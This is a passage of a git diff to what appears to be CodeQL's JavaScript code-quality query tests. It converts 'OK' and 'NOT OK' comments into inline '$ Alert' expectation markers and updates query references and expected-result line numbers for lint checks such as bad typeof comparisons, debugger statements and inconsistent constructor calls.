typeof v === 'undefined' && v !== undefined; // OK +const isFalsyObject = (v) => typeof v === 'undefined' && v !== undefined; function f(v) { - if (typeof v === 'undefined' && v !== undefined) { // OK + if (typeof v === 'undefined' && v !== undefined) { doSomething(v); } } diff --git a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.expected b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.expected index 81cd1fac8fd5..82d959bca090 100644 --- a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.expected +++ b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.expected @@ -1,3 +1,3 @@ | tst.js:2:9:2:16 | x + x>>1 | Whitespace around nested operators contradicts precedence. | | tst.js:42:9:42:20 | p in o&&o[p] | Whitespace around nested operators contradicts precedence. | -| tst.js:49:1:49:12 | x + x >> 1 | Whitespace around nested operators contradicts precedence. | +| tst.js:48:1:48:12 | x + x >> 1 | Whitespace around nested operators contradicts precedence. | diff --git a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.qlref b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.qlref index 4905e880b56a..b1d60a5feea0 100644 --- a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.qlref +++ b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.qlref @@ -1 +1,2 @@ -Expressions/WhitespaceContradictsPrecedence.ql \ No newline at end of file +query: Expressions/WhitespaceContradictsPrecedence.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js index d9942a5ec4a8..30b75270f946 100644 --- a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js +++ b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/tst.js @@ -1,35 +1,35 @@ function bad(x) { - return x + x>>1; + return x + x>>1; // $ Alert } function ok1(x) { - return x + x >> 1; + return x + x >> 1; } function ok2(x) { - return x+x >> 1; + return x+x >> 1; } function ok3(x) { - return x + (x>>1); + return x + (x>>1); } function ok4(x, y, z) { return x + y + z; } - + function ok5(x, y, z) { return x + y+z; } function ok6(x) { - return x + x>> 1; + return x + x>> 1; } function ok7(x, y, z) { return x + y - z; } - + function ok8(x, y, z) { return x + y-z; } @@ -38,18 +38,17 @@ function ok9(x, y, z) { return x * y*z; } -function ok10(o, p) { - return p in o&&o[p]; +function bad10(o, p) { + return p in o&&o[p]; // $ Alert } -// OK + x==y ** 2; -// NOT OK -x + x >> 1 +x + x >> 1 // $ Alert + -// OK x + x >> 1 -// OK (asm.js-like) -x = x - 1|0; \ No newline at end of file +// OK - asm.js-like +x = x - 1|0; diff --git a/javascript/ql/test/query-tests/JSDoc/BadParamTag/BadParamTag.qlref b/javascript/ql/test/query-tests/JSDoc/BadParamTag/BadParamTag.qlref index 13e42724d606..478f17148e10 100644 --- a/javascript/ql/test/query-tests/JSDoc/BadParamTag/BadParamTag.qlref +++ b/javascript/ql/test/query-tests/JSDoc/BadParamTag/BadParamTag.qlref @@ -1 +1 @@ -JSDoc/BadParamTag.ql \ No newline at end of file +query: JSDoc/BadParamTag.ql diff --git a/javascript/ql/test/query-tests/JSDoc/JSDocForNonExistentParameter/JSDocForNonExistentParameter.qlref b/javascript/ql/test/query-tests/JSDoc/JSDocForNonExistentParameter/JSDocForNonExistentParameter.qlref index 05473298ac8d..75206f43fafb 100644 --- a/javascript/ql/test/query-tests/JSDoc/JSDocForNonExistentParameter/JSDocForNonExistentParameter.qlref +++ b/javascript/ql/test/query-tests/JSDoc/JSDocForNonExistentParameter/JSDocForNonExistentParameter.qlref @@ -1 +1 @@ -JSDoc/JSDocForNonExistentParameter.ql \ No newline at end of file +query: JSDoc/JSDocForNonExistentParameter.ql diff --git a/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.expected b/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.expected index 6b028267ff76..4ed958a048a1 100644 --- a/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.expected +++ b/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.expected @@ -1,2 +1,2 @@ -| tst.js:6:15:6:15 | y | Parameter y is not documented. | -| tst.js:26:19:26:19 | y | Parameter y is not documented. | +| tst.js:4:15:4:15 | y | Parameter y is not documented. | +| tst.js:23:19:23:19 | y | Parameter y is not documented. | diff --git a/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.qlref b/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.qlref index 8c3b2613cba3..d6b0343c6c02 100644 --- a/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.qlref +++ b/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.qlref @@ -1 +1,2 @@ -JSDoc/UndocumentedParameter.ql \ No newline at end of file +query: JSDoc/UndocumentedParameter.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/tst.js b/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/tst.js index b785e06507a7..6143b7084c3b 100644 --- a/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/tst.js +++ b/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/tst.js @@ -1,9 +1,7 @@ /** - * NOT OK: Parameter y is not documented. - * * @param x The first operand. */ -function f(x, y) { +function f(x, y) { // $ Alert return x+y; } @@ -14,7 +12,6 @@ function g(x, y) { return x+y; } -// NOT OK /** * @param {int} x * @param {float} y @@ -23,6 +20,6 @@ var o = { /** * @param {String} x first argument. */ - f : function(x, y) { + f : function(x, y) { // $ Alert } }; diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ArgumentsCallerCallee/ArgumentsCallerCallee.qlref b/javascript/ql/test/query-tests/LanguageFeatures/ArgumentsCallerCallee/ArgumentsCallerCallee.qlref index 6f22e925dbd1..fd66fb21e620 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ArgumentsCallerCallee/ArgumentsCallerCallee.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/ArgumentsCallerCallee/ArgumentsCallerCallee.qlref @@ -1 +1,2 @@ -LanguageFeatures/ArgumentsCallerCallee.ql \ No newline at end of file +query: LanguageFeatures/ArgumentsCallerCallee.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ArgumentsCallerCallee/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/ArgumentsCallerCallee/tst.js index 32b12e606bc6..d988977efdd8 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ArgumentsCallerCallee/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/ArgumentsCallerCallee/tst.js @@ -1,7 +1,7 @@ (function (i) { if (i <= 1) return 1; - return i*arguments.callee(i-1); + return i*arguments.callee(i-1); // $ Alert }(3)); function f() { @@ -9,7 +9,7 @@ function f() { } function g() { - return arguments.caller.length; + return arguments.caller.length; // $ Alert } function h(arguments) { diff --git a/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.expected b/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.expected index bffe622dc7e0..7be415438250 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.expected @@ -1,3 +1,3 @@ -| tst.js:2:1:2:8 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:2:14:2:20 | 'array' | array | -| tst.js:19:9:19:16 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:23:6:23:11 | 'null' | null | -| tst.js:33:2:33:9 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:33:16:33:22 | 'array' | array | +| tst.js:1:1:1:8 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:1:14:1:20 | 'array' | array | +| tst.js:18:9:18:16 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:21:6:21:11 | 'null' | null | +| tst.js:30:2:30:9 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:30:16:30:22 | 'array' | array | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.qlref b/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.qlref index ebbb3c84a1e5..9ed7fa52f7cc 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.qlref @@ -1 +1,2 @@ -LanguageFeatures/BadTypeof.ql \ No newline at end of file +query: LanguageFeatures/BadTypeof.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/tst.js index de01c66ac808..9401c80cba52 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/tst.js @@ -1,36 +1,33 @@ -// NOT OK -typeof a === 'array'; +typeof a === 'array'; // $ Alert + -// OK typeof b == 'string'; -// OK + typeof c != "string"; -// OK + "number" !== typeof 23; -// OK + 'object' == typeof null; -// OK + typeof es6 === 'symbol'; -switch (typeof a) { -// OK +switch (typeof a) { // $ Alert + case 'undefined': -// NOT OK case 'null': } -// OK + switch (msg) { case 'null': case typeof a: } -// NOT OK -(typeof a) === 'array'; +(typeof a) === 'array'; // $ Alert // JScript extensions typeof a === 'unknown' || typeof a === 'date'; diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ConditionalComments/ConditionalComments.qlref b/javascript/ql/test/query-tests/LanguageFeatures/ConditionalComments/ConditionalComments.qlref index 8c331480b29c..908167804bcb 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ConditionalComments/ConditionalComments.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/ConditionalComments/ConditionalComments.qlref @@ -1 +1 @@ -LanguageFeatures/ConditionalComments.ql +query: LanguageFeatures/ConditionalComments.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/DebuggerStatement/DebuggerStatement.qlref b/javascript/ql/test/query-tests/LanguageFeatures/DebuggerStatement/DebuggerStatement.qlref index 6ec39aa879d7..ba16fbb07ece 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/DebuggerStatement/DebuggerStatement.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/DebuggerStatement/DebuggerStatement.qlref @@ -1 +1,2 @@ -LanguageFeatures/DebuggerStatement.ql +query: LanguageFeatures/DebuggerStatement.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/DebuggerStatement/debuggerStatement.js b/javascript/ql/test/query-tests/LanguageFeatures/DebuggerStatement/debuggerStatement.js index b456e6b2b1d4..7c4a7fb098ef 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/DebuggerStatement/debuggerStatement.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/DebuggerStatement/debuggerStatement.js @@ -1,3 +1,3 @@ function sayHello() { - debugger; + debugger; // $ Alert } diff --git a/javascript/ql/test/query-tests/LanguageFeatures/DeleteVar/DeleteVar.qlref b/javascript/ql/test/query-tests/LanguageFeatures/DeleteVar/DeleteVar.qlref index 0da47afc6a0e..70d65313b52a 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/DeleteVar/DeleteVar.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/DeleteVar/DeleteVar.qlref @@ -1 +1,2 @@ -LanguageFeatures/DeleteVar.ql \ No newline at end of file +query: LanguageFeatures/DeleteVar.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/DeleteVar/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/DeleteVar/tst.js index 1641372a53cc..8a6a7613d7a7 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/DeleteVar/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/DeleteVar/tst.js @@ -1,8 +1,8 @@ delete this.Object; -delete String; +delete String; // $ Alert function f(o, x) { delete o.p; delete o[x]; - delete x; + delete x; // $ Alert delete (o.p); } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/EmptyArrayInit.qlref b/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/EmptyArrayInit.qlref index f4decec514b3..142d91688dae 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/EmptyArrayInit.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/EmptyArrayInit.qlref @@ -1 +1,2 @@ -LanguageFeatures/EmptyArrayInit.ql \ No newline at end of file +query: LanguageFeatures/EmptyArrayInit.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/tst.js index 69daffb8a0b0..cf64a97a4d10 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/EmptyArrayInit/tst.js @@ -1,7 +1,7 @@ -var a = [], // OK - b = [1], // OK - c = [1, 2], // OK - d = [1, , 2], // NOT OK - e = [1,], // OK - f = [1, 2, ,], // NOT OK - g = [,1]; // NOT OK +var a = [], + b = [1], + c = [1, 2], + d = [1, , 2], // $ Alert + e = [1,], + f = [1, 2, ,], // $ Alert + g = [,1]; // $ Alert diff --git a/javascript/ql/test/query-tests/LanguageFeatures/Eval/Eval.qlref b/javascript/ql/test/query-tests/LanguageFeatures/Eval/Eval.qlref index 65753c6e2076..f6cdc87d5359 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/Eval/Eval.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/Eval/Eval.qlref @@ -1 +1,2 @@ -LanguageFeatures/Eval.ql +query: LanguageFeatures/Eval.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/Eval/eval.js b/javascript/ql/test/query-tests/LanguageFeatures/Eval/eval.js index 54ab88cd23e3..7845f9f07460 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/Eval/eval.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/Eval/eval.js @@ -1,4 +1,4 @@ function sayHello() { - eval("2+2"); + eval("2+2"); // $ Alert anotherFunction("2+2"); } diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.expected b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.expected index f3c95f56d3d2..01e87bf5c177 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.expected @@ -3,4 +3,4 @@ | letExpr.js:3:13:3:38 | let (x ... ) x + y | Use let declarations instead of let expressions. | | letStmt.js:3:1:5:1 | let (x ... + y);\\n} | Use let declarations instead of let statements. | | postfixComprehension.js:2:15:2:38 | [i*i fo ... mbers)] | Use prefix comprehensions instead of postfix comprehensions. | -| tst.js:2:15:2:31 | function(x) x * x | Use arrow expressions instead of expression closures. | +| tst.js:1:15:1:31 | function(x) x * x | Use arrow expressions instead of expression closures. | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.qlref b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.qlref index 422b2aeab8ee..ab1619db7165 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.qlref @@ -1 +1,2 @@ -LanguageFeatures/ExpressionClosures.ql \ No newline at end of file +query: LanguageFeatures/ExpressionClosures.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/foreach.js b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/foreach.js index 1df300534371..2f22bc5dce39 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/foreach.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/foreach.js @@ -3,6 +3,6 @@ var obj = {prop1: 5, prop2: 13, prop3: 8}; for each (var item in obj) { sum += item; -} +} // $ Alert console.log(sum); // logs "26", which is 5+13+8 diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/jscript.js b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/jscript.js index 0f6a81c8fb36..7b85bc8720f3 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/jscript.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/jscript.js @@ -1,3 +1,3 @@ -function window::onload() {} +function window::onload() {} // $ Alert window.onload = function onload() {} diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/letExpr.js b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/letExpr.js index a5c7a09b6be5..7c4b6c4eb804 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/letExpr.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/letExpr.js @@ -1,5 +1,5 @@ var x = 42, y = 19; -console.log(let (x = 23, y = 19) x + y); +console.log(let (x = 23, y = 19) x + y); // $ Alert console.log(x - y); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/letStmt.js b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/letStmt.js index 69beaac8a096..3b62e7f0d14c 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/letStmt.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/letStmt.js @@ -2,6 +2,6 @@ var x = 42, y = 19; let (x = 23, y = 19) { console.log(x + y); -} +} // $ Alert console.log(x - y); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/postfixComprehension.js b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/postfixComprehension.js index 3cca1b5c615f..181c90cfa7fe 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/postfixComprehension.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/postfixComprehension.js @@ -1,4 +1,4 @@ var numbers = [1, 2, 3, 4, 5]; -var squares = [i*i for (i of numbers)]; +var squares = [i*i for (i of numbers)]; // $ Alert var specialKeyCodes = [for (keyCodeName of Object.keys(SPECIAL_CODES_MAP)) SPECIAL_CODES_MAP[keyCodeName]]; diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/tst.js index 202ea2a262a6..610590712eeb 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/tst.js @@ -1,8 +1,7 @@ -// NOT OK -[1, 2, 3].map(function(x) x * x); +[1, 2, 3].map(function(x) x * x); // $ Alert + -// OK [1, 2, 3].map(function(x) { return x * x; }); -// OK + [1, 2, 3].map((x) => x * x); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ForInComprehensionBlocks/ForInComprehensionBlocks.qlref b/javascript/ql/test/query-tests/LanguageFeatures/ForInComprehensionBlocks/ForInComprehensionBlocks.qlref index 57bc034bdf70..d5b6deb7355b 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ForInComprehensionBlocks/ForInComprehensionBlocks.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/ForInComprehensionBlocks/ForInComprehensionBlocks.qlref @@ -1 +1,2 @@ -LanguageFeatures/ForInComprehensionBlocks.ql \ No newline at end of file +query: LanguageFeatures/ForInComprehensionBlocks.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ForInComprehensionBlocks/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/ForInComprehensionBlocks/tst.js index 08542e2be521..3ada68d3cf02 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ForInComprehensionBlocks/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/ForInComprehensionBlocks/tst.js @@ -1,2 +1,2 @@ var a = [23,,42]; -var desc = [for(i in a) i + " = a[" + i + "]"]; +var desc = [for(i in a) i + " = a[" + i + "]"]; // $ Alert diff --git a/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/IllegalInvocation.qlref b/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/IllegalInvocation.qlref index 1297139b9f9a..d1cf5afbb2ac 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/IllegalInvocation.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/IllegalInvocation.qlref @@ -1 +1,2 @@ -LanguageFeatures/IllegalInvocation.ql \ No newline at end of file +query: LanguageFeatures/IllegalInvocation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js index 3ed85a709341..48af86687794 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/IllegalInvocation/tst.js @@ -4,24 +4,24 @@ class C { class D extends C { constructor() { - super(); // OK + super(); } } -let c = new C(); // OK -C(); // NOT OK -new (x=>x); // NOT OK -c.m(); // OK -new c.m(); // NOT OK - but not flagged +let c = new C(); +C(); // $ Alert +new (x=>x); // $ Alert +c.m(); +new c.m(); // $ MISSING: Alert var o = { f: function() {}, g() {} }; -o.f(); // OK -new o.f(); // OK -o.g(); // OK -new o.g(); // NOT OK - but not flagged +o.f(); +new o.f(); +o.g(); +new o.g(); // $ MISSING: Alert function f(b) { var g; @@ -31,31 +31,31 @@ function f(b) { g = (() => {}); console.log(); if (!b) - g(); // OK + g(); else - new g(); // OK + new g(); } function* g() {} async function h() {} -new g() // NOT OK -new h() // NOT OK +new g() // $ Alert +new h() // $ Alert -C.call(); // NOT OK -C.apply(); // NOT OK +C.call(); // $ Alert +C.apply(); // $ Alert class E { static call() {} static apply() {} } -E.call(); // OK -E.apply(); // OK +E.call(); +E.apply(); function invoke(fn) { if (typeof fn === "function" && fn.hasOwnProperty("foo")) { - fn(); // OK + fn(); } } invoke(C); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/InconsistentNew.expected b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/InconsistentNew.expected index 0c03a59fd223..e2aa2ed56f3e 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/InconsistentNew.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/InconsistentNew.expected @@ -1,2 +1,2 @@ -| m.js:1:8:1:22 | functio ... = x;\\n} | Function A is sometimes invoked as a constructor (for example $@), and sometimes as a normal function (for example $@). | c1.js:2:1:2:9 | new A(42) | here | c2.js:2:1:2:5 | A(23) | here | -| tst.js:1:1:1:22 | functio ... = y;\\n} | Function Point is sometimes invoked as a constructor (for example $@), and sometimes as a normal function (for example $@). | tst.js:6:1:6:17 | new Point(23, 42) | here | tst.js:7:1:7:13 | Point(56, 72) | here | +| m.js:1:8:1:33 | functio ... = x;\\n} | Function A is sometimes invoked as a constructor (for example $@), and sometimes as a normal function (for example $@). | c1.js:2:1:2:9 | new A(42) | here | c2.js:2:1:2:5 | A(23) | here | +| tst.js:1:1:1:33 | functio ... = y;\\n} | Function Point is sometimes invoked as a constructor (for example $@), and sometimes as a normal function (for example $@). | tst.js:6:1:6:17 | new Point(23, 42) | here | tst.js:7:1:7:13 | Point(56, 72) | here | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/InconsistentNew.qlref b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/InconsistentNew.qlref index 8c5695ffb85c..a03be885e21c 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/InconsistentNew.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/InconsistentNew.qlref @@ -1 +1,2 @@ -LanguageFeatures/InconsistentNew.ql \ No newline at end of file +query: LanguageFeatures/InconsistentNew.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a1.js b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a1.js index 1585d8add718..3ecf658e45c9 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a1.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a1.js @@ -1,3 +1,3 @@ function A() {} -new A(); // OK -String(""); // OK \ No newline at end of file +new A(); +String(""); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a2.js b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a2.js index 407b91aec013..1c9f2e07a49a 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a2.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/a2.js @@ -1,6 +1,6 @@ function A() {} -A(); // OK +A(); function MyString() {} String = MyString; -new String(); // OK \ No newline at end of file +new String(); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/arraycalls.js b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/arraycalls.js index 6aaeaa7a9f18..a3477727286b 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/arraycalls.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/arraycalls.js @@ -1,2 +1,2 @@ -Array(45); // OK -new Array(45); // OK +Array(45); +new Array(45); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/m.js b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/m.js index 416caeb40635..1bc9fbf5f537 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/m.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/m.js @@ -1,3 +1,3 @@ -export function A(x) { +export function A(x) { // $ Alert this.x = x; }; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/tst.js index 56af21411b67..fb22e98ade67 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/InconsistentNew/tst.js @@ -1,4 +1,4 @@ -function Point(x, y) { +function Point(x, y) { // $ Alert this.x = x; this.y = y; } @@ -48,13 +48,13 @@ function RobustPoint4(x, y) { new RobustPoint4(23, 42); RobustPoint4(56, 72); -// OK: Error is an external function +// OK - Error is an external function new Error(); Error(); class C {} new C(); -C(); // NOT OK, but flagged by IllegalInvocation +C(); // OK - flagged by IllegalInvocation (function() { function A(x) { @@ -64,5 +64,5 @@ C(); // NOT OK, but flagged by IllegalInvocation A.call({}, 23); })(); -new Point(42, 23); // NOT OK, but not flagged since line 6 above was already flagged -Point(56, 72); // NOT OK, but not flagged since line 7 above was already flagged +new Point(42, 23); // OK - not flagged since line 6 above was already flagged +Point(56, 72); // OK - not flagged since line 7 above was already flagged diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/InvalidPrototype.qlref b/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/InvalidPrototype.qlref index 04e81233ed77..307244114cbc 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/InvalidPrototype.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/InvalidPrototype.qlref @@ -1 +1,2 @@ -LanguageFeatures/InvalidPrototype.ql \ No newline at end of file +query: LanguageFeatures/InvalidPrototype.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/tst.js index 1015db92cff4..5c12a3b7d853 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/InvalidPrototype/tst.js @@ -1,11 +1,11 @@ -var o1 = { __proto__: null }; // OK -Object.setPrototypeOf(o1, Function.prototype); // OK -Object.create(class{}); // OK -Function.prototype.isPrototypeOf(o1); // OK -o1.__proto__ = new Date(); // OK +var o1 = { __proto__: null }; 